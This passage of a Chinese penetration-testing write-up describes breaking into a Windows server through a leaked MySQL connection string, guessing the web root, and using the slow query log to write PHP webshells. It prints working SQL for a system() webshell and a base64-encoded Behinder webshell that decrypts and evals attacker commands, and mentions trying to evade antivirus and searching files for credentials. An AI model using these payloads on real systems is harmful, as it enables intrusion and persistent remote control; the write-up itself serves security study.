未扫到任何漏洞,怀疑是不是哪里有问题,本地代理用工具再跑一次:
确实不存在,这补丁确实都打了,白忙活了一场。想到之前还有个数据库的连接串还没利用,可能还有点搞头。由于之前代理过了,直接使用navicat连接数据库,查看一下mysql版本是5.7:
由于secure-file-priv的存在,无法尝试提权。nmap扫描了一下数据库的ip地址,发现8090端口还存在一个php系统,服务器是server。于是先查询一下mysql的数据库文件路径,发现不是phpstudy或者wamp等软件一键搭建的:
可要想获取shell,前提要得到web路径,才能写入木马,通过web报错页面、目录扫描都未获取到。于是开始尝试一下IIS的默认路径c:Inetpubwwwroot,写入后访问不到。想到mysql是放在d盘下,因此尝试d盘的d:www、d:Inetpubwwwroot、d:data等路径,都没访问到,最终随手测了下d:web,竟成功写入。通过mysql慢日志写shell过程如下:
set global slow_query_log=’ON’; set global slow_query_log_file=’D:/web/cmd.php’; select ‘<?php echo system($_GET[123]);?>’ or sleep(11); set global slow_query_log=’OFF’;
由于存在杀软,普通的一句话木马直接被杀,因此重新写入一个冰蝎的马:
set global slow_query_log=’ON’; set global slow_query_log_file=’D:/web/t.php’; select ‘<?php file_put_contents(“.1.php”,base64_decode(“PD9waHAKQGVyc**yX3JlcG9ydGluZygwKTsKc2Vzc2lvbl9zdGFydCgpOwogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7CgkkX1NFU1NJT05bJ2snXT0ka2V5OwoJJHBvc3Q9ZmlsZV9nZXRfY29udGVudHMoInBocDovL2lucHV0Iik7CglpZighZXh0ZW5zaW9uX2xvYWRlZCgnb3BlbnNzbCcpKQoJewoJCSR0PSJiYXNlNjRfIi4iZGVjb2RlIjsKCQkkcG9zdD0kdCgkcG9zd**iIik7CgkJCgkJZ**yKCRpPTA7JGk8c3RybGVuKCRwb3N0KTskaSsrKSB7CiAgICAJCQkgJHBvc3RbJGldID0gJHBvc3RbJGldXiRrZXlbJGkrMSYxNV07IAogICAgCQkJfQoJfQoJZWxzZQoJewoJCSRwb3N0PW9wZW5zc2xfZGVjcnlwdCgkcG9zdCwgIkFFUzEyOCIsICRrZXkpOwoJfQogICAgJGFycj1leHBsb2RlKCd8JywkcG9zdCk7CiAgICAkZnVuYz0kYXJyWzBdOwogICAgJHBhcmFtcz0kYXJyWzFdOwoJY2xhc3MgQ3twdWJsaWMgZnVuY3Rpb24gX19pbnZva2UoJHApIHtldmFsKCRwLiIiKTt9fQogICAgQGNhbGxfdXNlcl9mdW5jKG5ldyBDKCksJHBhcmFtcyk7CiA/PiA=”));?>’ or sleep(11); set global slow_query_log=’OFF’;
写入后直接访问t.php,重新生成.1.php的冰蝎马,直接连接:
查看一下系统权限,有点低:
查看一下ip地址:
由于是该台服务器server2012,无法直接获取windows密码,且存在国外某某科技的杀软,已有的提权工具都被杀了,技术不行绕不过,还是换个思路。
于是,开始翻找文件,看是否会有敏感信息。在服务器上发现多套源码,在其中的一个文件里发现了配置信息: